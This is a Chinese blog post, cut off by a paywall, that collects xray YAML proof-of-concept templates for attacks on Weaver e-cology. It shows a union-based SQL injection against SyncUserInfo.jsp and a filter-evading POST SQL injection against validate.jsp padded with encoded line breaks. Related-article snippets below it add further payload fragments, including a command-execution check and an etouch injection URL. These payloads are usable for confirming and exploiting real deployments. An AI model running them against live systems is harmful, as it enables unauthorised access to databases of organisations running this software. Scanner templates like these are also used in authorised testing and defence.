HW漏洞集合(四)-ecology&nexus-yaml版

最新推荐文章于 2024-07-24 22:21:53 发布
最新推荐文章于 2024-07-24 22:21:53 发布
阅读量2.3k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/115364528
版权

HW漏洞集合(四)-ecology&nexus-yaml版

主要是ecology、nexus,这里就是摘自XYAY的社区POC

31.ecology syncuserinfo sqli

name: poc-yaml-ecology-syncuserinfo-sqli
set:
  r1: randomInt(40000, 44800)
  r2: randomInt(40000, 44800)
rules:
  - method: GET
    path: >-
      /mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str({
  {r1}}*{
  {r2}}),null
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
  author: MaxSecurity(https://github.com/MaxSecurity)
  links:
    - https://www.weaver.com.cn/

32. ecology validate sqli

name: poc-yaml-ecology-validate-sqli
set:
  r1: randomInt(8000, 9999)
  r2: randomInt(800, 1000)
rules:
  - method: POST
    path: /cpt/manage/validate.jsp?sourcestring=validateNum
    body: >-
      sourcestring=validateNum&capitalid=11%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion+select+str({
  {r1}}*{
  {r2}})&capitalnum=-10
    follow_redirects: true
    expression: |
      response.status == 200 && response.body
最低0.47元/天 解锁文章
_HWHXY
关注
HW漏洞集合(一)-yaml
HWHXY的博客
03-28 723
HW漏洞集合(一)-yml link:2020护网中的漏洞复现 1.齐治堡垒机前远程命令执行漏洞(CNVD-2019-20835) name: poc-yaml-qzblj-java-CNVD-2019-20835 set: reverse: newReverse() reverseURL: reverse.url rules: - method: POST path: /shterm/listener/tui_update.php body: | ["t';im
Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)漏洞复现
挚爱凝华的博客
04-13 2981
搭建环境 浏览器访问ip:8081端口 构造payload访问passwd文件 原理:利用 JobManager 的 REST API,读取 JobManager 本地文件系统上的任意文件(JobManager 进程有权限能够读取到的文件)。 修复漏洞:升级到1.11.3或1.12.0本 ...
xray1.9.4高级社区下载
qq_49869351的博客
01-12 7560
xray因其方便的代理检测模式,高效率,易于使用,和多样的poc闻名于安全圈。就这23年初始,xray就更新了1.9.4本。已经添加了许可证,进行了pj。供大家下载,并且内置了superxray图像化界面,非常方便。
漏洞复现】泛微OA E-cology ResourceServlet 任意文件读取漏洞
最新发布
凝聚力安全团队
07-24 486
用友政务财务系统 ResourceServlet 接口存在任意文件读取漏洞,未经身份攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
HW-2022 0day Nday漏洞 汇总 0728
安全解决方案
07-28 1895
HW-2022 0day Nday漏洞 汇总 0728
D-Link DSL-2888A 远程命令执行漏洞(CVE-2020-24581/24579)
jammny
02-04 2388
漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该本固件中同时存在着一个不安全认证漏洞CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。 漏洞影响 AU_2.31_V1.1.47ae55之前本 EG_1.00b4 漏洞
最新xray1.9.11高级下载Windows/Linux
weixin_43167326的博客
12-28 2221
xray 是一款功能强大的安全评估工具,由多名经验丰富的一线安全从业者呕心打造而成,主要特性有: 检测速度快。发包速度快; 漏洞检测算法效率高。 支持范围广。大至 OWASP Top 10 通用漏洞检测,小至各种 CMS 框架 POC,均可以支持。 代码质量高。编写代码的人员素质高, 通过 Code Review、单元测试、集成测试等多层验证来提高代码可靠性。 高级可定制。通过配置文件暴露了引擎的各种参数,通过修改配置文件可以客制化功能。 安全无威胁。xray 定位为一款安全辅助评估工具,而不是攻击工具
某 E-Office v9 任意文件上传漏洞复现实战
blackpink01的博客
02-11 2754
本次复现漏洞为未公开漏洞 CNVD-2021-49104,该漏洞是由于 e-office 其上传模块中用户输入部分未能妥善处理,攻击者可以构造恶意的上传数据包,实现任意代码执行。
靶机渗透练习54-digitalworld.local:DEVELOPMENT
hirak0的博客
04-19 2940
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-development,280/ Description This machine reminds us of a DEVELOPMENT environment: misconfigurations rule the roost. This is designed for OSCP practice, and the original version of the machine wa
泛微OA-ecology-二次开发实例-开发完整说明.pdf
10-02
泛微OA-ecology-二次开发实例-开发完整说明.pdf
sql-ecology-lesson:通过SQL为生态学家进行数据管理
05-14
面向生态学家的数据木工SQL课 该存储库包含基于生态数据的Data Carpentry SQL资料。 请参阅我们的以获取有关如何贡献更新,错误修复或其他更正的信息。 维护者 蒂莫西·波伊索( )( ) 克里斯蒂娜·科赫( ) ...
python-ecology-lesson:生态学家使用Python进行数据分析和可视化
02-05
具有生态数据的数据木工Python课程 该存储库包含基于生态数据的Data Carpentry Python资料。 请参阅我们的以获取有关如何贡献更新,错误修复或其他更正的信息。 贡献 我们欢迎您为改进本课程而做出的所有贡献!...
weblogic 反序列化 (CVE-2020-2551)漏洞复现(vulfocus)
qq_40646572的博客
04-27 2395
weblogic 反序列化 (CVE-2020-2551)漏洞是基于IIOP协议执行远程代码进行利用。
xray完美插件poc-yaml-etouch-v2-sqli
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-14 1269
​原始yml:name: poc-yaml-etouch-v2-sqli name: poc-yaml-etouch-v2-sqli rules:- method: GET path: >-/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20IN
漏洞复现(包含近几年CVE)『持续更新中』
Zyu0
11-26 1025
FTP服务端请求伪造漏洞(SSRF)Spring Boot服务端模板注入(SSTI)漏洞XML外部实体(XXE)注入漏洞获取root私钥ipython 8.0.0 远程命令执行漏洞(CVE-2022-21699)Exiftool远程代码执行漏洞(CVE-2021-22204)ImageMagrick命令执行漏洞(CVE-2020-29599)Cachet配置泄露漏洞利用(CVE-2021-39174)Linux系统内核漏洞(CVE-2022-2588)mpdf 代码注入漏洞
CVE-2020-1472漏洞实战 深度剖析
Ms08067安全实验室
11-18 9277
本文作者:Faith(Ms08067实验室 内网安全攻防知识星球)0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Serv...
简单聊聊CVE-2020-13379
一个安全研究员
08-04 8110
多次跳转导致的ssrf
D-Link DSL-2888A 远程命令执行漏洞CVE-2020-24581/24579)
内心不种满鲜花就会长满杂草
03-09 4593
漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该本固件中同时存在着一个不安全认证漏洞CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。 漏洞影响 AU_2.31_V1.1.47ae55之前本 EG_1.00b4 漏.
ecology 7.1安装文件--弘创软件
01-13
ecology 7.1是一款由弘创软件公司开发的生态学模拟软件,旨在帮助用户模拟和分析生态系统中的各种因素和变化。该软件具有用户友好的界面和丰富的功能,适用于生态学研究、环境保护、教学等领域。 要安装ecology 7.1,首先需要从弘创软件的官方网站或授权的渠道获得安装文件。一旦获得安装文件,用户可以按照以下步骤进行安装: 1. 双击安装文件,启动安装向导。 2. 在安装向导中,按照提示选择安装目录和其他设置项。 3. 点击“下一步”继续安装过程。 4. 等待软件自动安装完成。 5. 完成安装后,可以在桌面或开始菜单中找到ecology 7.1的图标,双击打开软件。 在安装过程中,用户需要确保选择合适的安装目录,并按照软件提供的说明和建议进行设置。另外,安装过程中需要确保计算机具有足够的存储空间和系统要求,以保证软件的正常运行。 总的来说,安装ecology 7.1是一个简单且直观的过程,只要按照安装向导的提示操作即可。安装完成后,用户就可以开始使用这款强大的生态学模拟软件,进行各种生态系统研究和分析。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值